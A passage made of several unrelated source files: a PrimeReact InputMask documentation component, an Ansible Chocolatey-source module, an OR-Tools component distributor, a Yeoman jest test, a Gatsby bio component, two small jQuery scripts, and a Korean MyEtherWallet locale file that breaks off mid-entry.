id="phone" mask="(999) 999-9999" value={val4} placeholder="(999) 999-9999" onChange={(e) => setVal4(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="phoneext">Phone Ext</label> <InputMask id="phoneext" mask="(999) 999-9999? x99999" value={val5} placeholder="(999) 999-9999? x99999" onChange={(e) => setVal5(e.value)}></InputMask> </div> <div className="p-field p-col-12 p-md-4"> <label htmlFor="serial">Serial</label> <InputMask id="serial" mask="a*-999-a999" value={val6} placeholder="a*-999-a999" onChange={(e) => setVal6(e.value)}></InputMask> </div> </div> </div> </div> ); } ` } } } shouldComponentUpdate() { return false; } render() { return ( <div className="content-section documentation" id="app-doc"> <TabView> <TabPanel header="Documentation"> <h5>Import via Module</h5> <CodeHighlight lang="js"> {` import { InputMask } from 'primereact/inputmask'; `} </CodeHighlight> <h5>Import via CDN</h5> <CodeHighlight> {` <script src="https://unpkg.com/primereact/core/core.min.js"></script> <script src="https://unpkg.com/primereact/inputmask/inputmask.min.js"></script> `} </CodeHighlight> <h5>Getting Started</h5> <p>InputMask is used as a controlled component with <i>value</i> and <i>onChange</i> properties.</p> <CodeHighlight> {` <InputMask mask="99-999999" value={value} onChange={(e) => setValue(e.value)}></InputMask> `} </CodeHighlight> <h5>Mask</h5> <p>Mask format can be a combination of the the following built-in definitions.</p> <ul> <li> a - Alpha character (A-Z,a-z) </li> <li> 9 - Numeric character (0-9) </li> <li> * - Alpha numberic character (A-Z,a-z,0-9) </li> </ul> <CodeHighlight> {` <InputMask mask="a*-999-a999" value={value} onChange={(e) => setValue(e.value)}></InputMask> `} </CodeHighlight> <h5>SlotChar</h5> <p>Underscore is the default placeholder for a mask and this can be customized using <i>slotChart</i> option.</p> <CodeHighlight> {` <InputMask mask="99/99/9999" slotChar="mm/dd/yyyy" value={value} onChange={(e) => setValue(e.value)}></InputMask> `} </CodeHighlight> <h5>Optional Values</h5> <p>If the input does not complete the mask definition, it is cleared by default. Use <i>autoClear</i> property to control this behavior. In addition, certain part of a mask can be made optional by using ? symbol where anything after the question mark becomes optional.</p> <CodeHighlight> {` <InputMask mask="(999) 999-9999? x99999" value={value} onChange={(e) => setValue(e.value)}></InputMask> `} </CodeHighlight> <h5>Properties</h5> <div className="doc-tablewrapper"> <table className="doc-table"> <thead> <tr> <th>Name</th> <th>Type</th> <th>Default</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>id</td> <td>string</td> <td>null</td> <td>Unique identifier of the element.</td> </tr> <tr> <td>value</td> <td>string</td> <td>null</td> <td>Value of the component.</td> </tr> <tr> <td>type</td> <td>string</td> <td>text</td> <td>HTML5 input type</td> </tr> <tr> <td>mask</td> <td>string</td> <td>null</td> <td>Mask pattern.</td> </tr> <tr> <td>slotChar</td> <td>string</td> <td>-</td> <td>Placeholder character in mask, default is underscore.</td> </tr> <tr> <td>autoClear</td> <td>boolean</td> <td>true</td> <td>Clears the incomplete value on blur.</td> </tr> <tr> <td>unmask</td> <td>boolean</td> <td>false</td> <td>Defines if model sets the raw unmasked value to bound value or the formatted mask value.</td> </tr> <tr> <td>style</td> <td>string</td> <td>null</td> <td>Inline style of the element.</td> </tr> <tr> <td>className</td> <td>string</td> <td>null</td> <td>Style class of the element.</td> </tr> <tr> <td>placeholder</td> <td>string</td> <td>null</td> <td>Advisory information to display on input.</td> </tr> <tr> <td>size</td> <td>number</td> <td>null</td> <td>Size of the input field.</td> </tr> <tr> <td>maxlength</td> <td>number</td> <td>null</td> <td>Maximum number of character allows in the input field.</td> </tr> <tr> <td>tabIndex</td> <td>number</td> <td>null</td> <td>Specifies tab order of the element.</td> </tr> <tr> <td>disabled</td> <td>boolean</td> <td>false</td> <td>When present, it specifies that the element value cannot be altered.</td> </tr> <tr> <td>readOnly</td> <td>boolean</td> <td>false</td> <td>When present, it specifies that an input field is read-only.</td> </tr> <tr> <td>name</td> <td>string</td> <td>null</td> <td>Name of the input field.</td> </tr> <tr> <td>required</td> <td>boolean</td> <td>false</td> <td>When present, it specifies that the element must be filled out before submitting the form.</td> </tr> <tr> <td>tooltip</td> <td>any</td> <td>null</td> <td>Content of the tooltip.</td> </tr> <tr> <td>tooltipOptions</td> <td>object</td> <td>null</td> <td>Configuration of the tooltip, refer to the tooltip documentation for more information.</td> </tr> </tbody> </table> </div> <h5>Events</h5> <div className="doc-tablewrapper"> <table className="doc-table"> <thead> <tr> <th>Name</th> <th>Parameters</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>onFocus</td> <td>event: Browser event</td> <td>Callback to invoke when input receives focus.</td> </tr> <tr> <td>onBlur</td> <td>event: Browser event</td> <td>Callback to invoke when input loses focus.</td> </tr> <tr> <td>onComplete</td> <td>event: Browser event<br /> value: New value of the component</td> <td>Callback to invoke on when user completes the mask pattern.</td> </tr> <tr> <td>onChange</td> <td>originalEvent: Browser event <br /> value: New value of the component</td> <td>Callback to invoke on value change.</td> </tr> </tbody> </table> </div> <h5>Styling</h5> <p>Styling is same as <Link href="/inputtext"> inputtext component</Link>, for theming classes visit <Link href="/theming"> theming page.</Link></p> <h5>Dependencies</h5> <p>None.</p> </TabPanel> { useLiveEditorTabs({ name: 'InputMaskDemo', sources: this.sources }) } </TabView> </div> ); } }
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: win_chocolatey_source version_added: '2.7' short_description: Manages Chocolatey sources description: - Used to managed Chocolatey sources configured on the client. - Requires Chocolatey to be already installed on the remote host. options: admin_only: description: - Makes the source visible to Administrators only. - Requires Chocolatey >= 0.10.8. - When creating a new source, this defaults to C(False). type: bool allow_self_service: description: - Allow the source to be used with self-service - Requires Chocolatey >= 0.10.4. - When creating a new source, this defaults to C(False). type: bool bypass_proxy: description: - Bypass the proxy when using this source. - Requires Chocolatey >= 0.10.4. - When creating a new source, this defaults to C(False). type: bool certificate: description: - The path to a .pfx file to use for X509 authenticated feeds. - Requires Chocolatey >= 0.9.10. certificate_password: description: - The password for I(certificate) if required. - Requires Chocolatey >= 0.9.10. name: description: - The name of the source to configure. required: yes priority: description: - The priority order of this source compared to other sources, lower is better. - All priorities above C(0) will be evaluated first, then zero-based values will be evaluated in config file order. - Requires Chocolatey >= 0.9.9.9. - When creating a new source, this defaults to C(0). type: int source: description: - The file/folder/url of the source. - Required when I(state) is C(present) or C(disabled) and the source does not already exist. source_username: description: - The username used to access I(source). source_password: description: - The password for I(source_username). - Required if I(source_username) is set. state: description: - When C(absent), will remove the source. - When C(disabled), will ensure the source exists but is disabled. - When C(present), will ensure the source exists and is enabled. choices: - absent - disabled - present default: present update_password: description: - When C(always), the module will always set the password and report a change if I(certificate_password) or I(source_password) is set. - When C(on_create), the module will only set the password if the source is being created. choices: - always - on_create default: always author: - Jordan Borean (@jborean93) ''' EXAMPLES = r''' - name: remove the default public source win_chocolatey_source: name: chocolatey state: absent - name: add new internal source win_chocolatey_source: name: internal repo state: present source: http://chocolatey-server/chocolatey - name: create HTTP source with credentials win_chocolatey_source: name: internal repo state: present source: https://chocolatey-server/chocolatey source_username: username source_password: password - name: disable Chocolatey source win_chocolatey_source: name: chocoaltey state: disabled ''' RETURN = r''' '''
#!/usr/bin/env python # -- Content-Encoding: UTF-8 -- """ Node Composer: Isolate Distributor based on ``ortools`` Clusters the components of a composition into groups according to several criteria. :author: Thomas Calmant :license: Apache Software License 2.0 :version: 1.1.0 .. Copyright 2014 isandlaTech Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # Standard library import logging # iPOPO Decorators from pelix.ipopo.decorators import ComponentFactory, Provides, \ Instantiate # OR-Tools Linear solver from ortools.linear_solver import pywraplp as ortools # Composer from cohorte.composer.node.beans import EligibleIsolate import cohorte.composer # ------------------------------------------------------------------------------ # Module version __version_info__ = (1, 1, 0) __version__ = ".".join(str(x) for x in __version_info__) # Documentation strings format __docformat__ = "restructuredtext en" # ------------------------------------------------------------------------------ _logger = logging.getLogger(__name__) # ------------------------------------------------------------------------------ @ComponentFactory() @Provides(cohorte.composer.SERVICE_DISTRIBUTOR_ISOLATE) @Instantiate('cohorte-composer-node-distributor') class IsolateDistributor(object): """ Clusters components into groups. Each group corresponds to an isolate. """ def __init__(self): """ Sets up members """ # Number of calls to this distributor self._nb_distribution = 0 # Names of components considered unstable self.__unstable = set() def distribute(self, components, existing_isolates): """ Computes the distribution of the given components :param components: A list of RawComponent beans :param existing_isolates: A set of pre-existing eligible isolates :return: A tuple of tuples: updated and new EligibleIsolate beans """ # Prepare the lists of updated and new isolates updated_isolates = set() new_isolates = set() # Create a map name -> isolate bean map_isolates = {isolate.name: isolate for isolate in existing_isolates} # 1. Predefined host isolates reserved_isolates = set() remaining = set() for component in components: if component.isolate: isolate_name = component.isolate reserved_isolates.add(isolate_name) try: # Use existing bean isolate = map_isolates[isolate_name] isolate.add_component(component) updated_isolates.add(isolate) except KeyError: # Create a new bean isolate = EligibleIsolate(component.isolate, component.language, [component]) map_isolates[isolate_name] = isolate new_isolates.add(isolate) else: # Component must be treated afterwards remaining.add(component) # Hide reserved isolates for isolate_name in reserved_isolates: map_isolates.pop(isolate_name) # 2. Unstable components must be isolated # ... group remaining components by language remaining_stable = {} for component in remaining: if component.name in self.__unstable: # Component is known as unstable: isolate it isolate = EligibleIsolate(None, component.language, [component]) new_isolates.add(isolate) else: # Store stable component, grouped by language remaining_stable.setdefault(component.language, set()) \ .add(component) for language, components in remaining_stable.items(): # Gather components according to their compatibility updated, added = self.__csp_dist(map_isolates, components, language) updated_isolates.update(updated) new_isolates.update(added) # Return tuples of updated and new isolates beans return tuple(updated_isolates), tuple(new_isolates) def __csp_dist(self, map_isolates, components, language): """ Gather components using OR-Tools :param map_isolates: A Name -> EligibleIsolate bean map :param components: Set of components to gather :param language: Implementation language of components :return: A tuple: (updated isolates, new isolates) """ # Normalize entries (components and isolates) components_names = sorted(component.name for component in components) nb_components = len(components_names) isolates_names = sorted(map_isolates.keys()) # Compute boundaries max_isolates = max(len(components_names), len(isolates_names)) + 1 # Prepare the incompatibility matrix incompat_matrix = self.__make_incompatibility_matrix(components_names) # Prepare the problem solver solver = ortools.Solver("Components distribution", ortools.Solver.CBC_MIXED_INTEGER_PROGRAMMING) # Declare variables # ... component on isolate (Iso_i <=> Iso_i_j = 1) iso = {} for i, name in enumerate(components_names): for j in range(max_isolates): iso[i, j] = solver.IntVar(0, 1, "{0} on {1}".format(name, j)) # ... assigned isolates (for the objective) assigned_isolates = [solver.IntVar(0, 1, "Isolate {0}".format(i)) for i in range(max_isolates)] # ... number of isolates for a component (must be 1) nb_component_isolate = [solver.Sum(iso[i, j] for j in range(max_isolates)) for i in range(nb_components)] # ... number of components for an isolate nb_isolate_components = [solver.Sum(iso[i, j] for i in range(nb_components)) for j in range(max_isolates)] # Constraints: # ... 1 isolate per component for i in range(nb_components): solver.Add(nb_component_isolate[i] == 1) # ... assigned isolates values must be updated for j in range(max_isolates): solver.Add(assigned_isolates[j] >= nb_isolate_components[j] / nb_components) # ... Avoid incompatible components on the same isolate for i in range(len(incompat_matrix)): for j in range(max_isolates): # Pair on same isolate: sum = 2 solver.Add(iso[incompat_matrix[i][0], j] + iso[incompat_matrix[i][1], j] <= assigned_isolates[j]) # Define the objective: minimize the number of isolates nb_assigned_isolates = solver.Sum(assigned_isolates) solver.Minimize(nb_assigned_isolates) # Solve the problem solver.Solve() # Print results _logger.info("Number of isolates.: %s", int(solver.Objective().Value())) _logger.info("Isolates used......: %s", [int(assigned_isolates[i].SolutionValue()) for i in range(max_isolates)]) for i in range(nb_components): for j in range(max_isolates): if int(iso[i, j].SolutionValue()) == 1: break else: # No isolate associated ? j = None _logger.info("Component %s: Isolate %s", components_names[i], j) _logger.info("WallTime...: %s", solver.WallTime()) _logger.info("Iterations.: %s", solver.Iterations()) # TODO: Prepare result isolates updated_isolates = set() added_isolates = [EligibleIsolate(None, language, components)] return updated_isolates, added_isolates @staticmethod def __make_incompatibility_matrix(components_names): """ Prepares the incompatibility matrix :param components_names: List of components names. :return: A sorted incompatibility matrix """ # The incompatibility dictionary: component -> incompatible incompat = {'Component-A': ['Nemesis-A'], 'Component-B': ['Nemesis-B']} # Prepare the matrix (set of pairs) incompat_matrix = set() for name, incompat_names in incompat.items(): idx_name = components_names.index(name) for incompat_name in incompat_names: try: idx_incompat = components_names.index(incompat_name) # Store a sorted tuple (hashable) incompat_matrix.add(tuple( sorted((idx_name, idx_incompat)))) except ValueError: # An incompatible component is not in the composition pass # Return a sorted tuple or sorted tuples return tuple(sorted(incompat_matrix)) @staticmethod def handle_event(event): """ Handles a component/composition event :param event: The event to handle """ # TODO: notify the crash and incompatibility stores pass
const assert = require('yeoman-assert') const helpers = require('yeoman-test') const path = require('path') const rimraf = require('rimraf') const feature = 'jest' const testPath = path.join(__dirname, 'tmp-' + feature) const packageJSON = path.join(testPath, 'package.json') const config = require('../generators/app/features/' + feature) const prompts = require('../__mocks__/prompts') const { silent } = require('sugar-chalk') describe('Tests gitignore functionality', function () { beforeAll(async (done) => { silent(true) await helpers.run(path.join(__dirname, '../generators/app')) .inDir(testPath) .withOptions({ 'skip-install': true }) .withPrompts(Object.assign({ jest: true }, prompts)) silent(false) done() }, 1200000) afterAll(() => { rimraf.sync(testPath) }) test('checks if jest example is present', () => { const files = config.files().map((cur) => cur.target) assert.file(files) }) test('checks if jest depdencies were installed', () => { config.dependencies().forEach((cur) => { assert.fileContent(packageJSON, new RegExp(cur)) }) }) test('checks package.json jest settings', () => { assert.jsonFileContent(packageJSON, config.settings()) }) test('checks if jest test scripts was added', () => { assert.fileContent(packageJSON, new RegExp('jest')) }) })
/** * Bio component that queries for data * with Gatsby's StaticQuery component * * See: https://www.gatsbyjs.org/docs/static-query/ */ import React from "react" import { StaticQuery, graphql } from "gatsby" import Image from "gatsby-image" import styled from "styled-components" import { rhythm } from "../utils/typography" function Bio() { return ( <StaticQuery query={bioQuery} render={data => { const { author, social } = data.site.siteMetadata return ( <Container> <Image fixed={data.avatar.childImageSharp.fixed} alt={author} style={{ marginRight: rhythm(1 / 2), marginBottom: 0, minWidth: 50, borderRadius: `100%`, }} imgStyle={{ borderRadius: `50%`, }} /> <p> Written by <strong>{author}</strong>. {` `} {/* <a href={`https://twitter.com/${social.twitter}`}> You should follow him on Twitter </a> */} </p> </Container> ) }} /> ) } const bioQuery = graphql` query BioQuery { avatar: file(absolutePath: { regex: "/denise-caston.jpg/" }) { childImageSharp { fixed(width: 50, height: 50) { ...GatsbyImageSharpFixed } } } site { siteMetadata { author } } } ` const Container = styled.div` display: flex; ` export default Bio
$(function() { setInterval( function() { var seconds = new Date().getSeconds(); var sdegree = seconds * 6; var srotate = "rotate(" + sdegree + "deg)"; $("#sec").css({"-moz-transform" : srotate, "-webkit-transform" : srotate}); }, 1000 ); setInterval( function() { var hours = new Date().getHours(); var mins = new Date().getMinutes(); var hdegree = hours * 30 + (mins / 2); var hrotate = "rotate(" + hdegree + "deg)"; $("#hour").css({"-moz-transform" : hrotate, "-webkit-transform" : hrotate}); }, 1000 ); setInterval( function() { var mins = new Date().getMinutes(); var mdegree = mins * 6; var mrotate = "rotate(" + mdegree + "deg)"; $("#min").css({"-moz-transform" : mrotate, "-webkit-transform" : mrotate}); }, 1000 ); });
$(document).ready(function() { $("form#numbers").submit(function(event){ var countUntil = parseInt($("#count-until").val()); var countBy = parseInt($("#count-by").val()); var array = []; if (countUntil < 0 || countBy < 0) { alert("Please use only positive numbers"); } else if (countUntil < countBy){ alert ("The number you'll count until should be bigger than the number you'll count by."); } else { for (var i = countBy; i <= countUntil; i += countBy) { array.push(i); var stringResult = array.join(", "); $("#display-count-to").text(countUntil); $("#display-count-by").text(countBy); $("#display-output").text(stringResult); $(".display-result").show(); }; } event.preventDefault(); }); });
// Korean 'use strict'; var ko = function() {} ko.code = 'ko'; ko.data = { /* Navigation*/ NAV_AddWallet : '지갑 추가 ', NAV_BulkGenerate : '대량 생성 ', NAV_Contact : '문의하기 ', NAV_Contracts : '컨트랙트 ', NAV_DeployContract : '컨트랙트 배포 ', NAV_ENS : 'ENS', NAV_GenerateWallet : '지갑 생성 ', NAV_Help : '도움말 ', NAV_InteractContract : '컨트랙트 조작 ', NAV_Multisig : '멀티시그 ', NAV_MyWallets : '내 지갑 ', NAV_Offline : '오프라인 전송 ', NAV_SendEther : '이더리움 & 토큰 전송 ', NAV_SendTokens : '토큰 전송 ', NAV_SignMsg : '메세지 서명 ', NAV_Swap : '교환 ', NAV_ViewWallet : '지갑 정보 보기 ', NAV_YourWallets : '내 지갑 ', /* General */ x_Access : '액세스 ', x_AddessDesc : '이것은 자신의 계좌 번호와 공개 키입니다. ETH를 전송하기 위해 필요한 정보입니다. 아이콘은 자신의 주소를 식별합니다. ', x_Address : '내 주소 ', x_Cancel : '취소 ', x_CSV : 'CSV 파일 (암호화되지 않음) ', x_Download : '다운로드 ', x_Json : 'JSON 파일 (암호화되지 않음) ', x_JsonDesc : '이것은 암호화되지 않은 JSON 형식의 개인 키입니다. 이 암호화되지 않은 JSON 형식의 개인 키를 사용하면 누구나 암호없이 자신의 지갑과 이더리움에 액세스 할 수 있습니다. ', x_Keystore : 'Keystore 파일 (UTC / JSON · 권장 · 암호화됨) ', x_Keystore2 : 'Keystore 파일 (UTC / JSON) ', x_KeystoreDesc : '이 Keystore / JSON 파일은 Mist에서 사용하는 형식과 일치하므로 나중에 쉽게 가져올 수 있습니다. 다운로드하고 백업하는 것을 권장합니다. ', x_Mnemonic : 'Mnemonic 문구 ', x_ParityPhrase : 'Parity 문구 ', x_Password : '비밀번호 ', x_Print : '종이 지갑 인쇄 ', x_PrintDesc : '팁: 프린터를 사용하지 않더라도 인쇄를 클릭하여 PDF 파일로 저장할 수 있습니다! ', x_PrintShort : '인쇄 ', x_PrivKey : '개인 키 (암호화되지 않음) ', x_PrivKey2 : '개인 키 ', x_PrivKeyDesc : '이것은 암호화되지 않은 개인 키이므로 암호가 필요하지 않습니다. 이 암호화되지 않은 개인 키를 사용하면 누구나 암호 없이 지갑을 사용할 수 있습니다. 따라서 암호화된 개인 키 사용을 권장합니다. ', x_Save : '저장 ', x_TXT : 'TXT 파일 (암호화되지 않음) ', x_Wallet : '지갑 ', /* Header */ CX_Tagline : '오픈 소스 JavaScript 클라이언트 측 이더리움 지갑 Chrome 확장 프로그램 ', CX_Warning_1 : '반드시 이곳에 보관하는 모든 지갑은 **외부 백업**을 진행해주세요. 이 Chrome 확장 프로그램에서는 확장 프로그램 제거 및 재설치를 포함하여 데이터가 저장되지 않고 손실되는 경우가 자주 발생합니다. 이 확장 프로그램은 쉬운 조작을 제공할 뿐, **백업**을 제공하지 않습니다. ', MEW_Tagline : '오픈 소스 JavaScript 클라이언트 측 이더리움 지갑 ', MEW_Warning_1 : '지갑에 액세스하거나 새 지갑을 생성하기 전 반드시 URL을 확인해주세요. 피싱(사기) 사이트에 주의하세요! ', /* Footer */ FOOTER_1 : '쉽게 사용할 수 있는 오픈 소스, 클라이언트 측 도구 & 이더리움 네트워크와 안전하게 상호 작용합니다. ', FOOTER_1b : '개발자 ', FOOTER_2 : '기부해주셔서 정말 감사합니다. ', FOOTER_3 : '클라이언트 측 지갑 생성 ', FOOTER_4 : '면책 조항 ', /* Sidebar */ sidebar_AccountInfo : '계정 정보 ', sidebar_AccountAddr : '계정 주소 ', sidebar_AccountBal : '계정 잔액 ', sidebar_TokenBal : '토큰 잔액 ', sidebar_Equiv : '동일한 가치 ', sidebar_TransHistory : '트랜잭션 내역 ', sidebar_donation : 'MyEtherWallet은 개인정보보호와 보안을 위한 무료 오픈 서비스입니다. 기부를 많이 받을수록 우리는 새로운 기능과 다양한 의견을 반영하여 사용자의 희망 사항을 위한 개발 시간을 늘리는 것이 가능해질 수 있습니다. 우리는 단 두명이 세상을 바꾸려 하고 있습니다. 도와주시겠습니까? ', sidebar_donate : '기부 ', sidebar_thanks : '감사합니다!!! ', /* Decrypt Panel */ decrypt_Access : '지갑 액세스 방법 선택 ', decrypt_Title : '비공개 키의 형식을 선택해주세요. ', decrypt_Select : '지갑 선택 ', /* Mnemonic */ MNEM_1 : '액세스하고자 하는 주소를 선택해주세요. ', MNEM_2 : '하나의 HD Mnemonic 문구에서 여러 가지 지갑/주소를 액세스할 수 있습니다. 액세스하려는 주소를 선택해주세요. ', MNEM_more : '나머지 주소 ', MNEM_prev : '이전 주소 ', /* Hardware wallets */ x_Ledger : 'Ledger Nano S ', ADD_Ledger_1 : '사용자의 Ledger Nano S를 연결해주세요 ', ADD_Ledger_2 : '이더리움 어플리케이션을 실행해주세요 (또는 컨트랙트 어플리케이션) ', ADD_Ledger_3 : 'Browser Support가 활성화된 상태인지 확인해주세요 ', ADD_Ledger_4 : '설정에서 Browser Support를 확인할 수 없으면, Ledger [Firmware 1.2] (https://www.ledgerwallet.com/apps/manager) 버전이 설치되어 있는지 확인해주세요. ', ADD_Ledger_0a : 'MyEtherWallet을 보안 연결(SSL)로 다시 연결해주세요. ', ADD_Ledger_0b : 'MyEtherWallet을 [Chrome](https://www.google.com/chrome/browser/desktop/) 또는 [Opera](https://www.opera.com/) 브라우저로 다시 열어주세요. ', ADD_Ledger_scan : 'Ledger Nano S 에 연결하기 ', x_Trezor : 'TREZOR ', ADD_Trezor_scan : 'TREZOR 에 연결하기 ', /* Add Wallet */ ADD_Label_1 : '어떤 걸 진행하시겠습니까? ', ADD_Radio_1 : '새로운 지갑 생성 ', ADD_Radio_2 : '지갑 파일 선택하기 (Keystone / JSON) ', ADD_Radio_2_alt : '지갑 파일 선택하기 ', ADD_Radio_2_short : '지갑 파일 선택하기... ', ADD_Radio_3 : '개인 키를 복사해서 입력해주세요. ', ADD_Radio_4 : '모니터링 계좌 추가 ', ADD_Radio_5 : 'Mnemonic 붙여넣기/입력 ', ADD_Radio_5_Path : 'HD derivation 경로 선택 ', ADD_Radio_5_PathCustom : '커스텀 ', ADD_Label_2 : '닉네임 만들기 ', ADD_Label_3 : '당신의 지갑은 암호화되었습니다. 비밀번호를 입력해주세요. ', ADD_Label_4 : '모니터링 계좌 추가 ', ADD_Warning_1 : '지갑 탭은 개인 키를 업로드하지 않고 임의로 모니터링하는 계좌를 추가할 수 있습니다. 이에 따라 지갑의 액세스나 이더리움 전송이 가능하지 않습니다. ', ADD_Label_5 : '주소 입력 ', ADD_Label_6 : '지갑 잠금 해제 ', ADD_Label_6_short : '잠금 해제 ', ADD_Label_7 : '계좌 추가 ', ADD_Label_8 : '비밀번호 (선택): ', /* My Wallet */ MYWAL_Nick : '지갑 닉네임 ', MYWAL_Address : '지갑 주소 ', MYWAL_Bal : '잔액 ', MYWAL_Edit : '편집 ', MYWAL_View : '보기 ', MYWAL_Remove : '제거 ', MYWAL_RemoveWal : '지갑 제거 ', MYWAL_WatchOnly : '내 모니터링 전용 계좌 ', MYWAL_Viewing : '지갑 표시 ', MYWAL_Hide : '지갑 정보 숨기기 ', MYWAL_Edit_2 : '지갑 수정 ', MYWAL_Name : '지갑 이름 ', MYWAL_Content_1 : '경고! 지갑을 제거하려고 합니다. ', MYWAL_Content_2 : '제거하기 전 ** 개인 키 및 Keystore 파일, 비밀번호 **가 저장되어 있는지 확인해주세요. ', MYWAL_Content_3 : '나중에 이 지갑을 MyEtherWallet CX와 같이 사용하려면, 개인 키/JSON과 비밀번호를 이용하여 수동으로 다시 추가해야 합니다. ', /* Generate Wallets */ GEN_desc : '만약 여러 개의 지갑을 생성하고 싶다면, 여기서 처리할 수 있습니다. ', GEN_Label_1 : '안전한 비밀번호를 입력해주세요 (최소 9 글자) ', GEN_Placeholder_1 : '비밀번호를 저장하고 기억하는 것을 잊지 마세요! ', GEN_SuccessMsg : '성공! 당신의 지갑이 생성되었습니다. ', GEN_Label_2 : '당신의 지갑 파일을 저장해주세요. 비밀번호를 잃어버리면 안됩니다. ', GEN_Label_3 : '지갑 주소를 저장해주세요 ', GEN_Label_4 : '선택: 종이 지갑을 인쇄하거나 QR 코드를 저장해주세요. ', /* Bulk Generate Wallets */ BULK_Label_1 : '생성할 지갑 개수 ', BULK_Label_2 : '지갑 생성하기 ', BULK_SuccessMsg : '성공! 당신의 지갑들이 생성되었습니다. ', /* Sending Ether and Tokens */ SEND_addr : '받는 주소 ', SEND_amount : '보낼 수량 ', SEND_amount_short : '보낼 수량 ', SEND_custom : '커스텀 토큰 추가 ', SEND_gas : '가스 ', SEND_TransferTotal : '잔액 모두 전송하기 ', SEND_generate : '트랜잭션 생성 ', SEND_raw : '초기 트랜잭션 ', SEND_signed : '서명된 트랜잭션 ', SEND_trans : '트랜잭션 전송하기 ', SENDModal_Title : '경고! ', /* full sentence reads "You are about to send "10 ETH" to address "0x1234". Are you sure you want to do this? " */ SENDModal_Content_1 : '전송할 예정입니다. ', SENDModal_Content_2 : '받는 주소 ', SENDModal_Content_3 : '정말 전송 하시겠습니까? ', SENDModal_Content_4 : '참고: 에러가 발생한다면, 대부분 토큰 전송에 필요한 가스(수수료, 이더리움으로 결제)가 부족한 것입니다. 이더리움을 계좌에 추가해 주세요. ', SENDModal_No : '아니요, 전송을 취소합니다. ', SENDModal_Yes : '네, 맞습니다! 전송합니다. ', /* Tokens */ TOKEN_Addr : '주소 ', TOKEN_Symbol : '토큰 기호 ', TOKEN_Dec : '소수 자릿수 ', TOKEN_show : '모든 토큰 보기 ', TOKEN_hide : '토큰 숨기기 ', /* Send Transaction */ TRANS_desc : '만약 토큰을 전송하고 싶다면 , "토큰 전송하기" 페이지를 사용해주세요. ', TRANS_warning : '"이더리움만 전송하기" 또는 "이더리움 클래식만 전송하기" 를 사용하여 전송할 때, 몇 가지 서비스는 컨트랙트가 체결되지 않을 수 있습니다. 더보기. ', TRANS_advanced : '+고급: 데이터 추가 ', TRANS_data : '데이터 ', TRANS_gas : '가스 한도 ', TRANS_sendInfo : '21000 가스를 사용하는 표준 트랜잭션은 0.000441 ETH 를 사용합니다. 우리는 최소 가스 가격인 0.000000021 보다 약간 높게 책정하여 전송을 빠르게 합니다. MyEtherWallet은 트랜잭션 수수료를 얻지 않습니다. ', /* Offline Transaction */ OFFLINE_Title : '오프라인 트랜잭션 생성 & 전송하기 ', OFFLINE_Desc : '오프라인 트랜잭션은 3단계로 이루어 집니다. 1, 3 단계는 온라인 컴퓨터로 진행되고, 2 단계는 오프라인/인터넷이 연결되지 않은 컴퓨터로 진행됩니다. 이러한 단계는 개인 키가 인터넷에 연결된 장치에 도달하지 못하도록 합니다. ', OFFLLINE_Step1_Title : '1 단계 : 정보 생성하기 (온라인 컴퓨터) ', OFFLINE_Step1_Button : '정보 생성 ', OFFLINE_Step1_Label_1 : '보내는 주소 ', OFFLINE_Step1_Label_2 : '참고: 이것은 받는 주소가 아닌 보내는 주소입니다. Nonce는 원래 계좌에서 생성됩니다. 인터넷에 연결되지 않은 컴퓨터를 사용하는 경우 이 주소는 콜드 스토리지 계좌의 주소가 됩니다. ', OFFLINE_Step2_Title : '2 단계 : 트랜잭션 생성하기 (오프라인 컴퓨터) ', OFFLINE_Step2_Label_1 : '받는 주소 ', OFFLINE_Step2_Label_2 : '보낼 금액/총량 ', OFFLINE_Step2_Label_3 : '가스 가격 ', OFFLINE_Step2_Label_3b : '이것은 1단계에서 온라인 컴퓨터에 표시됩니다. ', OFFLINE_Step2_Label_4 : '가스 한도 ', OFFLINE_Step2_Label_4b : '21000 가스는 기본 설정값입니다. 컨트랙트를 전송하거나 데이터를 더할 때, 사용 가스는 다를 수 있습니다. 사용되지 않은 가스는 환급됩니다. ', OFFLINE_Step2_Label_5 : 'Nonce ', OFFLINE_Step2_Label_5b : '이것은 1단계에서 온라인 컴퓨터에 표시됩니다. ', OFFLINE_Step2_Label_6 : '데이터 ', OFFLINE_Step2_Label_6b : '이것은 선택사항입니다. 데이터는 컨트랙트에 대해 트랜잭션을 전송할 때 자주 사용됩니다. ', OFFLINE_Step2_Label_7 : '개인 키 / JSON 입력 또는 선택 ', OFFLINE_Step3_Title : '3 단계 : 전송 또는 트랜잭션 발행 (온라인 컴퓨터) ', OFFLINE_Step3_Label_1 : '2단계에서 서명된 트랜잭션를 붙여넣고, "트랜잭션 전송하기" 버튼을 누르세요 ', /* Contracts */ CONTRACT_Title : '컨트랙트 주소 ', CONTRACT_Title_2 : '기존 컨트랙트 선택하기 ', CONTRACT_Json : 'ABI / JSON 인터페이스 ', CONTRACT_Interact_Title : '컨트랙트 읽기/쓰기 ', CONTRACT_Interact_CTA : '함수 선택 ', CONTRACT_ByteCode : 'Byte 코드 ', CONTRACT_Read : '읽기 ', CONTRACT_Write : '쓰기 ', DEP_generate : 'Byte 코드 생성하기 ', DEP_generated : '생성된 Byte 코드 ', DEP_signtx : '서명 트랜잭션 ', DEP_interface : '생성된 인터페이스 ', /* Node Switcher */ NODE_Title : '커스텀 노드 설정하기 ', NODE_Subtitle : '로컬 노드에 연결하려면... ', NODE_Warning : 'MyEtherWallet.com을 통해 연결하기 위해서는 HTTPS 노드가 필요합니다. 모든 노드에 연결하려면 [MyEtherWallet 저장소를 다운로드하고 로컬로 실행] (https://github.com/kvhnuke/etherwallet/releases/latest) 할 수 있습니다. 추가로 무료 SSL 인증서를 [LetsEncrypt](https://letsencrypt.org/)에서 받으실 수 있습니다. ', NODE_Name : '노드 명 ', NODE_Port : 